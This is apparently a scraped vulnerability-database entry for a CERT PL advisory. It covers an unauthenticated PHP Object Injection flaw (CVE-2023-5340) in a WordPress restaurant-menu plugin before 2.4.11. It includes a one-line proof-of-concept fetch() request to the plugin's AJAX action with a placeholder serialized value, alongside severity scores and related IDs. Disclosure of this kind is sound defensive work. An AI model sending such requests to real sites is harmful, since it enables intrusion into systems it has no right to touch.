Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:91A5847A-62E7-4B98-A554-5EECB6A06E5BHistoryOct 27, 2023 - 12:00 a.m.
Five Star Restaurant Menu and Food Ordering < 2.4.11 - Unauthenticated PHP Object Injection
2023-10-2700:00:00
Krzysztof Zając (CERT PL)
wpscan.com
2
unauthenticated users
php object injection
ajax action
vulnerability
five star restaurant menu
Description The plugin unserializes user input via an AJAX action available to unauthenticated users, allowing them to perform PHP Object Injection when a suitable gadget is present on the blog.
PoC
Run the below command in the developer console of the web browser while being on the blog unauthenticated fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “fdm_update_cart_item”, “options”: “data-to-unserialize”}), “method”: “POST”, “credentials”: “include” });
| CPE | Name | Operator | Version |
|---|---|---|---|
| eq | 2.4.11 |
Related
cvelist
cvelist
cve
cve
CVE-2023-5340
2023-11-20 19:15:09
prion
prion
Design/Logic Flaw
2023-11-20 19:15:00
wpexploit
wpexploit
nvd
nvd
CVE-2023-5340
2023-11-20 19:15:09
6.8 Medium
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
60.8%
Related for WPVDB-ID:91A5847A-62E7-4B98-A554-5EECB6A06E5B